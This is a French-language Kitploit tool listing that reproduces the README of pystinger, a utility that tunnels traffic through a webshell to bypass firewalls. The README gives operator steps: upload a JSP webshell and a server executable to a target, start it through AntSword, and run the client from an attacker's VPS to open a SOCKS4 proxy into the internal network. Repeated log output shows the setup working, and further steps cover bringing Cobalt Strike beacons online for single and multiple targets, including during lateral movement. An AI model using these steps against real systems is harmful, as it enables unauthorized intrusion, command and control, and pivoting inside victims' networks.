Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
pystinger — Contournement du pare-feu pour le transfert de trafic via webshell | Kitploit
Outils/GitHubGitHub/funnywolf/pystinger
Frameworks d'ExploitationGénération de PayloadsÉvasion IDS/IPSMouvement LatéralExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleRed Teaming
GitHubfunnywolf/pystinger

pystinger

Contournement du pare-feu pour le transfert de trafic via webshell

Voir le dépôt
1.4k204il y a 4 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

pystinger

Anglais | 简体中文

Pystinger implémente un proxy SOCK4 et un mappage de ports via webshell.

Il peut être utilisé directement par metasploit-framework, viper, cobalt strike pour les sessions en ligne.

Pystinger est développé en Python et supporte actuellement trois scripts proxy : php, jsp(x) et aspx.

Utilisation

Supposons que le nom de domaine du serveur soit http://example.com :8080 L'adresse IP du réseau interne du serveur est 192.168.3.11

Proxy SOCK4

  • Téléchargez proxy.jsp sur le serveur cible et assurez-vous que http://example.com:8080/proxy.jsp est accessible, la page renvoie UTF-8
  • Téléchargez stinger_server.exe sur le serveur cible, dans AntSword exécutez la commande start D:/XXX/stinger_server.exe pour démarrer pystinger-server

N'exécutez pas D:/xxx/singer_server.exe directement, cela entraînera une déconnexion TCP.

  • Exécutez ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000 sur votre VPS
  • Vous verrez la sortie suivante :
root@kitploit:~
root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 127.0.0.1:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
  • Vous avez maintenant démarré un proxy socks4a sur le VPS 127.0.0.1:60000 pour le réseau interne de example.com.
  • Maintenant, le serveur cible (example.com) 127.0.0.1:60020 a été mappé vers le VPS 127.0.0.1:60020

Beacon en ligne de cobaltstrike pour une cible unique

  • Téléchargez proxy.jsp sur le serveur cible et assurez-vous que http://example.com:8080/proxy.jsp est accessible, la page renvoie UTF-8
  • Téléchargez stinger_server.exe sur le serveur cible, dans AntSword exécutez la commande start D:/XXX/stinger_server.exe pour démarrer pystinger-server

N'exécutez pas D:/xxx/singer_server.exe directement, cela entraînera une déconnexion TCP.

  • Exécutez ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000 sur votre VPS
  • Vous verrez la sortie suivante :
root@kitploit:~
root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 127.0.0.1:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
  • Ajoutez un listener dans cobaltstrike, le port du listener est 60020 (port Handler/LISTEN dans RAT CONFIG de la sortie), l'adresse du listener est 127.0.0.1
  • Générez le payload, téléchargez-le sur la cible et exécutez-le.

Beacon en ligne de cobaltstrike pour plusieurs cibles

  • Téléchargez proxy.jsp sur le serveur cible et assurez-vous que http://example.com:8080/proxy.jsp est accessible, la page renvoie UTF-8
  • Téléchargez stinger_server.exe sur le serveur cible, dans AntSword exécutez la commande start D:/XXX/stinger_server.exe 192.168.3.11 pour démarrer pystinger-server (192.168.3.11 est l'adresse IP du réseau interne de la cible)

192.168.3.11 peut être changé en 0.0.0.0

  • Exécutez ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000 sur votre VPS
  • Vous verrez la sortie suivante :
root@kitploit:~
root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 192.168.3.11:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 192.168.3.11:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
  • Ajoutez un listener dans cobaltstrike, le port du listener est 60020 (port Handler/LISTEN dans RAT CONFIG de la sortie), l'adresse du listener est 192.168.3.11
  • Générez le payload, téléchargez-le sur la cible et exécutez-le.
  • Lors d'un mouvement latéral vers d'autres hôtes, vous pouvez pointer le payload vers 192.168.3.11:60020 pour mettre le beacon en ligne.

En-tête personnalisé et proxy

  • Si le webshell nécessite de configurer un cookie ou une autorisation, l'en-tête de la requête peut être configuré via le paramètre -- header --header "Authorization: XXXXXX,Cookie: XXXXX"

  • Si le webshell doit être accédé via un proxy, vous pouvez définir le proxy avec l'option -- proxy --proxy "socks5:127.0.0.1:1081"

Outils connexes

https://github.com/nccgroup/ABPTTS

https://github.com/sensepost/reGeorg

https://github.com/SECFORCE/Tunna

Testé

stinger_server\stinger_client

  • windows
  • linux

proxy.jsp(x)/php/aspx

  • php7.2
  • tomcat7.0
  • iis8.0

Journal des mises à jour

2.0 Date de mise à jour : 2019-09-29

  • Le service proxy Socks4 est déplacé vers le client

2.1 Date de mise à jour : 2020-01-07

  • Prise en charge de cobaltstrike en ligne (mappage de ports)

Le développement est soutenu par le logiciel de jetbrains.
https://www.jetbrains.com/?from=pystinger

Télécharger l’outil